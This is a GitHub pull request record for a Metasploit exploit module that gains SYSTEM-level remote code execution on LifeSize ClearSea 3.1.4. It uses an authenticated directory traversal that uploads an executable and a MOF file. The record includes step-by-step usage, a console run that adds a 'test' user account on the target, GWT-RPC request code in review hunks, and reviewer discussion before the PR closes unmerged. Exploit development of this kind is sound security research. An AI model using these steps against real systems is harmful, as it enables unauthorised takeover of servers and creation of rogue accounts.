### PR TITLE
Add lifesize_clearsea_file_upload_rce exploit module

### PR DESCRIPTION
**Pull request by rsp3ar**
This module exploits a post-authentication directory traversal vulnerability on LifeSize ClearSea 3.1.4 server to gain remote code execution as SYSTEM user.

## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/windows/http/lifesize_clearsea_file_upload_rce`
  3. Set `RHOST`
  4. Set `ADMIN_USER` and `ADMIN_PASS` for valid admin credential to login
  5. Run `check` to check if remote host is vulnerable
  6. Set `payload` and required options
  7. Run `run` to execute the exploit
  8. The specified payload should be executed on target

## Options

  **ADMIN_USER**
  Admin user name. Default is admin.
  **ADMIN_PASS**
  Admin password. Default is admin.

## Scenarios

To execute specified payload:
```
msf > use exploit/windows/http/lifesize_clearsea_file_upload_rce
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set ADMIN_USER admin
ADMIN_USER => admin
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set ADMIN_PASS admin
ADMIN_PASS => admin
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > check 

[*] Authenticating as user 'admin'...
[*] Successfully authenticated as user 'admin'
[+] 127.0.0.1:8800 The target is vulnerable.
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set payload windows/exec 
payload => windows/exec
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > set CMD net user test password /add
CMD => net user test password /add
msf exploit(windows/http/lifesize_clearsea_file_upload_rce) > run 

[*] Authenticating as user 'admin'...
[*] Successfully authenticated as user 'admin'
[*] Generating .exe payload...
[*] Uploading .exe payload NkNlLuOTF.exe...
[*] Generating .mof file...
[*] Uploading .mof file OyMXijFO.mof...
[!] This exploit may require manual cleanup of 'NkNlLuOTF.exe' on the target
[!] This exploit may require manual cleanup of 'WBEM\MOF\GOOD\OyMXijFO.mof' on the target
[*] Exploit completed, but no session was created.
```

Target (before exploit ran):
```
C:\>type C:\ClearSea\etc\product.ini
type C:\ClearSea\etc\product.ini
[PRODUCT]
code=ClearSea
version=3.1.4
build=59125
port=8800

[MANAGEMENT]
servicesStartOrder=ClearSea-HttpAS
servicesStopOrder=ClearSea;ClearSea-HttpAS;ClearSea-PgSQL
controlPanelUrl=http://{host}:8800
sharedFolders.0.path=log
sharedFolders.0.fullAccess=false
rescueServerResourcesPath=webapps/rescueserver

[SECURITY]
restrictedTcpPorts=8800;3388;3389;139;445;8801;
restrictedUdpPorts=137;138;161;162;

[SNMP]
apiUrl=http://localhost:65356/processor

[HOUSEKEEPING]
cleanPattern.0.path=log/*
cleanPattern.0.maxAgeDays=32
cleanPattern.0.rmEmptySubdirs=false
cleanPattern.1.path=data/temp/*
cleanPattern.1.maxAgeDays=2
cleanPattern.1.rmEmptySubdirs=true
cleanPattern.2.path=data/record/*
cleanPattern.2.maxAgeDays=2
cleanPattern.2.rmEmptySubdirs=true
cleanPattern.3.path=log/heapDumps/*
cleanPattern.3.maxAgeDays=2
cleanPattern.3.rmEmptySubdirs=false

[TROUBLESHOOTING]
collectPattern.0.path=log/*{date}*
collectPattern.1.path=cfg/*
collectPattern.2.path=bin/ClearSea.lic
collectPattern.3.path=etc/product.ini
collectPattern.4.path=log/out.log
collectPattern.5.path=log/err.log
collectPattern.6.path=log/cdr/*{date}*
collectPattern.7.path=data/database/data/*.err
collectPattern.8.path=log/dmp/*{date}*
collectPattern.9.path=data/backup/*.sql
collectPattern.10.path=log/internal/*{date}*
collectPattern.11.path=log/heapDumps/*

C:\>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            ClearSea                 console                  
Guest                    restore                  
The command completed with one or more errors.

```

Target (after exploit ran)
```
C:\>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            ClearSea                 console                  
Guest                    restore                  test                     
The command completed with one or more errors.

```

### CODE REVIEW

**Comment by jrobles-r7** [comment]
https://github.com/rsp3ar/metasploit-framework/pull/1

I submitted a PR to your branch.

**Comment by jrobles-r7** [comment]
@rsp3ar were you able to test with the changes I submitted? 
rsp3ar#1

File: modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb [hunk 1]
```diff
@@ -0,0 +1,185 @@
...
+        'ctype' => 'text/x-gwt-rpc; charset=utf-8',
+        'cookie' => @cookie,
+        'data' => "5|0|7|||com.manthia.gui.metadata.client.FormService|load|java.lang.String|#{session_token}|-m-ClearSea-c-SYSTEM_STATUS_FORM|1|2|3|4|2|5|5|6|7|"
+      })
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      return CheckCode::Unknown
+    end
+
+    if res && res.body.include?('3.1.4')
+      return CheckCode::Vulnerable
```
Comment (bcoles) [inline modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb]: `CheckCode::Appears` would be more appropriate.

Also, are other versions vulnerable?

File: modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb [hunk 2]
```diff
@@ -0,0 +1,185 @@
...
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri('smartgui', 'sessionService'),
+        'ctype' => 'text/x-gwt-rpc; charset=utf-8',
+        'cookie' => @cookie,
+        'data' => '5|0|4|||com.manthia.gui.metadata.client.SessionService|beginSession|1|2|3|4|0|'
+      })
+    rescue Rex::ConnectionError, Errno::ENOTCONN => e
+      return CheckCode::Unknown
```
Comment (bcoles) [inline modules/exploits/windows/http/lifesize_clearsea_file_upload_rce.rb]: It might be nice to know why.

```ruby
vprint_error 'Connection failed'
```

**Comment by rsp3ar** [comment]
@jrobles-r7 @bcoles Unfortunately I've lost access to the vulnerable system, nor was I able to obtain the related VM image. Sorry, but I'm not able to verify against a vulnerable target any more.

**Comment by bcoles** [comment]
Added `delayed` tag until someone can test this and address the review comments above.

**Comment by acammack-r7** [comment]
@rsp3ar sorry we couldn't get this landed before you lost access to the vulnerable environment. Since this has been waiting a while, I am going to close this for now and add the `attic` tag so we don't lose track of it. You can learn about our new PR label [on our wiki](https://github.com/rapid7/metasploit-framework/wiki/So-Your-PR-was-closed#moved-to-the-attic). Feel free to reopen if you get the opportunity to test this again.

**Pull request closed without merging**